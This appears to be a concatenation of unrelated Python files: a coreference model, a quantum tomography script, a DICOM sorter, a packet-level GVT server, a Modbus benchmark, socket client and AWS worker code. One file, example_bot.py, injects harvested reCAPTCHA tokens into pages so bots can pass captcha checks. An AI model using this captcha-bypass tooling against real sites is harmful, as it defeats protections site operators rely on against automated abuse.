mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
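  # Marginalized antecedent cross-entropy: non-gold antecedents are masked out with
  # log(0) = -inf, so the loss is log-sum-exp over all scores minus log-sum-exp over
  # the gold ones, letting probability mass concentrate on any one correct antecedent.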
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
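  # Illustrative mappings (not in the original source): 0 -> 0, 3 -> 3, 6 -> 5
  # (bucket 5-7), 20 -> 7 (bucket 16-31), 100 -> 9 (64+), 1000 -> 9 (clipped);
  # distances <= 4 keep their identity bucket.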
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
      antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c, emb]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
        segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, c, emb]
        segment_distance_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
losses = []
doc_keys = []
    num_evaluated = 0
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
_, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# if tensorized_example[0].shape[0] <= 9:
# if keys is not None and example['doc_key'] in keys:
# print('Skipping...', example['doc_key'], tensorized_example[0].shape)
# continue
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
# losses.append(session.run(self.loss, feed_dict=feed_dict))
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
summary_dict = {}
# with open('doc_keys_512.txt', 'w') as f:
# for key in doc_keys:
# f.write(key + '\n')
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout)
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
return util.make_summary(summary_dict), f
|
compare_Wchain_sgd_1layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding, qtm.loss
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_wchain(num_layers, num_qubits):
thetas = np.ones(num_layers*num_qubits*4)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_chain: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Wchain_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Wchain_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Wchain_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
    print('Writing ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1]
num_qubits = [2, 3, 4, 5, 6]
t_wchains = []
for i in num_layers:
for j in num_qubits:
t_wchains.append(multiprocessing.Process(target = run_wchain, args=(i, j)))
for t_wchain in t_wchains:
t_wchain.start()
for t_wchain in t_wchains:
t_wchain.join()
print("Done!")
|
dicom_file_classifier.py
|
import os
import os.path
import pydicom
import shutil
from multiprocessing import Process
import time
# set initial values
src_path = "dicom file directory"
des_path = "destination directory"
process_count = 10 # number of process you use
def sd_form(s): # Series Description
    s = s.replace(' ', '_')
    s = s.replace('<', '_')
    s = s.replace('>', '_')
    s = s.upper()
    return s
def sn_form(s): # Series Number
    s = s.zfill(4)
    return s
def pn_form(s): # Patient Number
    s = s.replace(' ', '_')
    s = s.upper()
    return s
def create_folder(dir): # create a new folder, only if it doesn't already exist
if os.path.isdir(dir):
return
try:
os.makedirs(dir)
print(f"Folder created \"{dir}\"")
except FileExistsError:
print(f"[Error] while creating new folder \"{dir}\"")
def get_dirs(path):
dir_list = list()
dirs = os.listdir(path)
for dir in dirs:
dir_path = os.path.join(path, dir)
if os.path.isdir(dir_path):
dir_list.append(dir_path)
return dir_list
def split_num(num, divisor): # set number of folders allocated to a process
l = list()
range_list = list()
q, r = divmod(num, divisor)
for i in range(divisor):
l.append(q)
for i in range(r):
l[i] += 1
for i, n in enumerate(l):
n += sum(l[:i])
range_list.append(n)
return range_list
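# Illustrative example (not in the original source): split_num(10, 3) returns
# [4, 7, 10], so split_list below slices dir_list[0:4], dir_list[4:7], dir_list[7:10],
# spreading 10 folders over 3 processes as 4 + 3 + 3.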
def split_list(dir_list, num_pr):
total = list()
num_dir = len(dir_list)
range_list = split_num(num_dir, num_pr)
index = 0
for n in range_list:
total.append(dir_list[index:n])
index = n
return total
def create_dcm_folder(id, new_path, path_list):
for path in path_list:
for root, dirs, files in os.walk(path):
rootpath = os.path.join(path, root)
for file in files:
                filepath = os.path.join(rootpath, file)
# data elements info for foldername
try:
ds = pydicom.dcmread(filepath, specific_tags=['SeriesDescription','SeriesNumber','PatientName','PatientID'])
                except Exception:
                    # skip files that cannot be parsed as DICOM
                    continue
series_des = sd_form(str(ds.SeriesDescription))
series_num = sn_form(str(ds.SeriesNumber))
patient_name = pn_form(str(ds.PatientName))
patient_id = str(ds.PatientID)
parentF_name = f'{patient_name}_{patient_id}'
subF_name = f'{series_des}_{series_num}'
new_folder_path = os.path.join(new_path, parentF_name, subF_name)
create_folder(new_folder_path)
shutil.copy2(filepath, new_folder_path) # copy file # (filepath) > (new_folder_path)
##################################################
if __name__ == "__main__":
start = time.time()
path = os.path.abspath(src_path)
new_path = os.path.abspath(des_path)
dir_list = get_dirs(path)
dir_list = split_list(dir_list, process_count)
process_l = list()
for i, dir in enumerate(dir_list):
p = Process(target=create_dcm_folder, args=(i, new_path, dir))
p.start()
process_l.append(p)
for p in process_l:
p.join()
print(f"time: {time.time() - start}")
|
example_bot.py
|
# Importing local packages
from browser import Browser
from harvester_manager import HarvesterManger
from harvester import Harvester
# Importing external packages
from selenium.webdriver.common.by import By
from selenium.common.exceptions import WebDriverException
# Importing standard packages
import time
import datetime
from threading import Thread
import random
import zipfile
class Bot(Browser):
def __init__(self, harvester_manager: HarvesterManger, delay: int = 0.1):
super(Bot, self).__init__()
self.harvester_manager = harvester_manager
self.delay = delay
self.control_element = f'controlElement{random.randint(0, 10 ** 10)}'
self.looping = False
def main_loop(self) -> None:
if not self.looping:
self.looping = True
while self.looping:
if self.is_open:
                # TODO: refine this broad try/except
try:
self.tick()
except WebDriverException:
print('Some selenium exception (bot).')
time.sleep(self.delay)
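    # Injects a small control panel next to the page's reCAPTCHA widget (status text,
    # inject button, hidden timestamp), then copies harvested tokens from the manager's
    # response_queue into g-recaptcha-response and clears them once older than 120 s.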
def tick(self):
inject_list = (
f'document.getElementsByClassName("g-recaptcha")[0].insertAdjacentHTML("beforebegin", \'<div class="{self.control_element}"></div>\');',
f'document.getElementsByClassName(\'{self.control_element}\')[0].innerHTML = \'<span class="clicked_{self.control_element}"></span><input type="button" class="button_{self.control_element}" value="Click to inject captcha"><span class="description_{self.control_element}"></span><span class="timestamp_{self.control_element}"></span>\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.border = \'2px solid #333\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.borderRadius = \'20px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.height = \'27px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.marginBottom = \'5px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.padding = \'0\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.overflow = \'hidden\';',
f'document.getElementsByClassName(\'clicked_{self.control_element}\')[0].style.display = \'none\';',
f'document.getElementsByClassName(\'timestamp_{self.control_element}\')[0].style.display = \'none\';',
f'document.getElementsByClassName(\'description_{self.control_element}\')[0].style.marginLeft = \'5px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.boxSizing = \'border-box\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].onclick = function(){{document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML = "clicked";}};',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.borderRadius = \'20px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.margin = \'0\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.padding = \'0\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.cursor = \'pointer\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.padding = \'5px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'#333\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.color = \'white\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.border = \'none\';'
)
if not self.execute_script(f'return document.getElementsByClassName("{self.control_element}")'):
for inject_html in inject_list:
self.execute_script(inject_html)
if not self.execute_script('return grecaptcha.getResponse();'):
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].style.cursor = "pointer"')
self.execute_script(f'document.getElementsByClassName("{self.control_element}")[0].style.border = "2px solid #333"')
self.execute_script(f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'#333\';', )
self.execute_script(f'document.getElementsByClassName("description_{self.control_element}")[0].innerHTML = "Captchas harvested: {len(self.harvester_manager.response_queue)}"')
if self.execute_script(f'return document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML;'):
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Waiting for captcha"')
else:
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Click to inject captcha"')
else:
now = datetime.datetime.now()
timestamp = self.execute_script(f'return document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML;')
if timestamp:
timestamp_string = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
delta = now - timestamp_string
                self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Captcha injected"')
                self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].style.cursor = "default"')
                self.execute_script(f'document.getElementsByClassName("description_{self.control_element}")[0].innerHTML = "Captcha expires in {120 - delta.seconds} seconds"')
self.execute_script(f'document.getElementsByClassName("{self.control_element}")[0].style.border = "2px solid green"')
self.execute_script(f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'green\';', )
if self.execute_script(f'return document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML;'):
if self.execute_script('return grecaptcha.getResponse();') == '':
if len(self.harvester_manager.response_queue) > 0:
self.find_element(By.CLASS_NAME, 'g-recaptcha')
value = self.find_element(By.CLASS_NAME, 'g-recaptcha-response').text
if value == '' or self.execute_script('return grecaptcha.getResponse();') == '':
self.execute_script(f'document.getElementsByClassName("g-recaptcha-response")[0].value = "{self.harvester_manager.response_queue[0]["response"]}";')
self.execute_script(f'document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML = "{self.harvester_manager.response_queue[0]["timestamp"]}";')
self.harvester_manager.response_queue.pop(0)
timestamp = self.execute_script(f'return document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML;')
if timestamp:
now = datetime.datetime.now()
timestamp_string = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
delta = now - timestamp_string
if delta.seconds > 120:
self.execute_script(f'document.getElementsByClassName("g-recaptcha-response")[0].value = "";')
self.execute_script(
f'document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML = "";')
self.execute_script(
f'document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML = "";')
# Example of using the captcha harvester with an example Bot class that receives captcha responses and uses them to submit a form.
# NOTE: This example uses 2 Harvester objects; one of them logs in to a Google account and launches an extra window with YouTube.
def main():
url = 'https://www.google.com/recaptcha/api2/demo'
# Scraping sitekey from url
sitekey = Harvester.get_sitekey(url)
# Creating HarvesterManager object
harvester_manager = HarvesterManger()
# Adding Harvester object to HarvesterManager object with url and sitekey as arguments
harvester_manager.add_harvester(Harvester(url=url, sitekey=sitekey))
# Adding Harvester object to HarvesterManager object with additional arguments to login to Google account and open window with Youtube.
harvester_manager.add_harvester(Harvester(url=url, sitekey=sitekey, log_in=True, open_youtube=True, proxy='ip:port:login:password'))
# Launching all harvesters
harvester_manager.start_harvesters()
# Creating Bot object with HarvesterManager as argument so it can reach its response_queue
bot = Bot(harvester_manager)
# Launching Bot
bot.start(url=url)
# Creating bot and harvester_manager main_loop threads
bot_loop_thread = Thread(target=bot.main_loop)
harvester_manager_loop_thread = Thread(target=harvester_manager.main_loop)
# Starting threads
bot_loop_thread.start()
harvester_manager_loop_thread.start()
# Joining threads
bot_loop_thread.join()
harvester_manager_loop_thread.join()
if __name__ == '__main__':
main()
|
server_based.py
|
#!/usr/bin/env python
import argparse
import sys
import socket
import random
import struct
import threading
import time
import thread
import json
from scapy.all import sendp, send, get_if_list, get_if_hwaddr
from scapy.all import Packet
from scapy.all import Ether, IP, UDP, TCP
from proposalHeader import GvtProtocol
from receive import *
TYPE_PROP = 0x1919
TYPE_REQ = 0x1515
TYPE_GVT = 0x600
TYPE_DEL = 0x1313
TYPE_PREPARE = 0x3333
TYPE_PREPAREOK = 0x4444
TYPE_STARTCHANGE = 0x4343
TYPE_STARTVIEW = 0x4747
TYPE_FAILURE = 0x5555
TYPE_DELFAILURE = 0x6666
TYPE_VIEWCHANGE = 0x700
TYPE_RESENDPROP = 0x1919
class gvtControl:
def __init__(self, dest_ip, pid):
#creates socket to a destination
self.addr = socket.gethostbyname(dest_ip)
self.iface = self.get_if()
self.pid = pid
self.dest_ip = dest_ip
self.GVT_value = 0
self.last_proposal = 0
self.last_proposal_time = 0
self.leader_alive = 1
self.sent_but_not_yet_acknowledged = 0
#interfaces
self.GVT_list = {}
self.queue = []
#start receiver thread
self.receivethread = threading.Thread(target=self.receiveThread)
self.receivethread.start()
#just for debugging
#start run loop
self.run_loop = threading.Thread(target=self.runThread)
self.run_loop.start()
self.send = threading.Thread(target=self.send_queue)
self.send.start()
self.list = ["10.0.1.1", "10.0.2.2", "10.0.4.4", "10.0.5.5", "10.0.6.6",
"10.0.7.7", "10.0.8.8", "10.0.9.9", "10.0.10.10", "10.0.11.11", "10.0.12.12",
"10.0.13.13", "10.0.14.14", "10.0.15.15", "10.0.16.16", "10.0.17.17", "10.0.18.18"]
def receiveThread(self):
#ifaces = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))
#iface = ifaces[0]
print "sniffing on %s" % self.iface
sys.stdout.flush()
sniff(iface = self.iface, prn = lambda x: self.handle_pkt(x))
#TODO: Change this interface after the failure
def handle_pkt(self, pkt):
if TCP in pkt and pkt[TCP].dport == 7777:
print "got a packet"
pkt.show2()
self.proposal = json.loads(pkt.load)
print self.proposal
self.compute_gvt(self.proposal)
sys.stdout.flush()
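    # GVT is approximated as the minimum over the most recent LVT proposal received
    # from each process; the resulting value is then broadcast to every host in self.list.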
def compute_gvt(self, proposal):
key = proposal.keys()
self.GVT_list[key[0]] = proposal[key[0]]
minval = min(self.GVT_list.values())
for x in self.list:
            print('WHAT IS HAPPENING')
self.send_packet(minval, self.pid, x)
def resend_old_messages(self):
        # currently only sends one message at a time
        # TODO: store and resend all of the application's messages
if(self.sent_but_not_yet_acknowledged):
self.send_packet(message_value=int(self.sent_but_not_yet_acknowledged), process_pid=self.pid)
def get_if(self):
self.ifs=get_if_list()
iface=None # "h1-eth0"
for i in get_if_list():
if "eth0" in i:
iface=i
                break
if not iface:
print "Cannot find eth0 interface"
exit(1)
self.ifs.remove('lo')
self.ifs.remove('eth0')
print(self.ifs)
return iface
def send_packet(self, message_value, process_pid, p_addr):
self.payload = {}
self.payload[process_pid] = message_value
pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type = 0x800)
pkt = pkt /IP(dst=p_addr) / TCP(dport=1234, sport=random.randint(49152,65535))/ json.dumps(self.payload)
sendp(pkt, iface=self.iface, verbose=False)
def build_proposal(self, proposal_value):
self.last_proposal = int(proposal_value)
self.send_packet(message_value=int(proposal_value), process_pid=self.pid)
#this thread implements a run loop. Just for writing LVT values as a debug functionality
def runThread(self):
while True:
value = input('Type new LVT:')
print "sending on interface %s to %s" % (self.iface, str(self.addr))
#TODO: We need to enforce the concurrency control here
self.queue.append([value, time.time()])
#self.last_proposal_time = time.time()
def send_queue(self):
#TODO: concurrency control
while True:
time.sleep(1)
if(self.sent_but_not_yet_acknowledged == 0 and len(self.queue) > 0):
get = self.queue.pop(0)
self.sent_but_not_yet_acknowledged = get[0]
print self.sent_but_not_yet_acknowledged
self.last_proposal_time = get[1]
self.build_proposal(proposal_value=self.sent_but_not_yet_acknowledged)
def main():
if len(sys.argv)<3:
        #TODO: this destination IP argument does not make sense here; fix it
print 'pass 2 arguments: <destination_ip> <pid>'
exit(1)
GVTcontrol_instance = gvtControl(sys.argv[1], int(sys.argv[2]))
if __name__ == '__main__':
main()
|
modbus_poll.py
|
#!/usr/bin/env python
import argparse
import json
import logging
import threading
import sys
import signal
from time import sleep, time
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
def poll_range(num, den):
ret = [den] * (num / den)
if num % den > 0:
ret.append(num % den)
return ret
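# Illustrative example (not in the original source), relying on Python 2 integer
# division: poll_range(120, 50) returns [50, 50, 20], i.e. 120 registers are read
# as two 50-register chunks plus one 20-register remainder.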
def modbus_poller(id, stop_event, config):
log = logging.getLogger("worker-" + str(id))
log.setLevel(logging.DEBUG)
client = ModbusClient(host=config["address"], port=config["port"])
client.connect()
log.info("Worker started")
t_max = -1
while not stop_event.is_set():
log.info("Poller turn")
t0 = time()
address = 0
for i in poll_range(config["num_controls"], config["chunk_size"]):
result = client.read_input_registers(address=address, count=i, unit=1)
address += i
if result is not None:
if result.function_code >= 0x80 and result.function_code != 132:
log.warn("Server returned error!")
print result
stop_event.set()
break
elif result.function_code == 132:
print "Server fault: " + str(result)
sleep(1)
break
t = time() - t0
log.info("Request took " + str(t) + " s")
if t > t_max:
t_max = t
sleep(config["thread"]["interval"])
log.info("Worker shutting down")
log.info("Max worker process time: " + str(t_max))
client.close()
def validate_config(config):
ret = "address" in config and "port" in config and "num_threads" in config and "thread" in config
if ret:
thread = config["thread"]
ret = "actions" in thread and type(thread["actions"]) is list
ret = ret and "interval" in thread
return ret
class StopperHandler:
def __init__(self, event):
self.ev = event
def __call__(self, signum, frame):
print "Signal received"
self.ev.set()
def main():
# configure logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
# parse arguments
parser = argparse.ArgumentParser(description="Modbus TCP test and benchmark utility")
parser.add_argument("-c", "--config", help="poller config file", type=str, required=True)
parser.add_argument("-s", "--server", help="Modbus server address", type=str, required=True)
parser.add_argument("-p", "--port", help="Modbus server port", type=int, required=True)
parser.add_argument("-t", "--nthreads", help="Number of polling threads", type=int, required=True)
parser.add_argument("-f", "--fq", help="Polling frequency", type=float, required=True)
parser.add_argument("-n", "--ncontrols", help="Number of registers", type=int, required=True)
parser.add_argument("--chunk-size", help="Number of registers to read at once", type=int, default=50)
args = parser.parse_args()
# open config file
config = json.loads(open(args.config).read())
config["address"] = args.server
config["port"] = args.port
config["num_threads"] = args.nthreads
config["num_controls"] = args.ncontrols
config["chunk_size"] = args.chunk_size
if abs(args.fq) < 0.00001:
print >>sys.stderr, "Warning: limit frequency to 0.00001 Hz (10s interval)"
args.fq = 0.00001
config["thread"]["interval"] = 1 / args.fq
    # check if all required fields are here
# if not validate_config(config):
# print >>sys.stderr, "ERROR: Wrong config format"
# sys.exit(1)
# init threads and exit event
ev_exit = threading.Event()
# create signal handlers to stop
sighndlr = StopperHandler(ev_exit)
signal.signal(signal.SIGINT, sighndlr)
signal.signal(signal.SIGTERM, sighndlr)
threads = []
for i in range(config["num_threads"]):
threads.append(threading.Thread(target=modbus_poller, args=(i, ev_exit, config)))
# start threads
for i in range(len(threads)):
threads[i].start()
# just wait for stop event
while not ev_exit.is_set():
sleep(0.1)
log.info("Time to sleep, snakeys")
# join all threads
for i in range(len(threads)):
threads[i].join()
# that's all
if __name__ == "__main__":
main()
|
client.py
|
#!/usr/bin/env python3
'''
Client script for simple client/server example
Copyright (C) Simon D. Levy 2021
MIT License
'''
from threading import Thread
from time import sleep
import socket
from struct import unpack
from header import ADDR, PORT
def comms(data):
'''
Communications thread
'''
# Connect to the client
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDR, PORT))
# Loop until main thread quits
while True:
# Receive and unpack three floating-point numbers
data[0], data[1], data[2] = unpack('=fff', sock.recv(12))
# Yield to the main thread
sleep(0.001)
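# A minimal sketch of the matching sender side (assumed, not shown in this file):
# the server presumably packs three floats the same way before sending, e.g.
#   from struct import pack
#   conn.send(pack('=fff', x, y, z))  # 12 bytes: native byte order, no padding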
def main():
    # Create a list to receive the data
data = [0, 0, 0]
# Start the client on its own thread
t = Thread(target=comms, args=(data,))
    t.daemon = True
t.start()
# Loop until user hits CTRL-C
while True:
try:
print('%3.3f %3.3f %3.3f ' % tuple(data))
sleep(.01)
except KeyboardInterrupt:
break
main()
|
server.py
|
import os
import logging
import boto3
import signal
import socket
import json
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from botocore.config import Config as BotoCoreConfig
from threading import Semaphore, Thread, Event
from multiprocessing import Pool
from .worker import init_worker, run_worker_task
logger = logging.getLogger('stefuna')
def activity_region(activity_arn):
"""
Return the region for an AWS activity_arn.
'arn:aws:states:us-east-2:123456789012:stateMachine:hello_world' => 'us-east-2'
"""
if activity_arn:
parts = activity_arn.split(':')
return parts[3] if len(parts) >= 4 else None
else:
return None
class Server(object):
worker_class = None
def __init__(self, name='StefunaWorker', activity_arn=None,
processes=None, heartbeat=0, maxtasksperchild=100,
server_config=None, worker_config=None, healthcheck=None, loglevel=None):
if Server.worker_class is None:
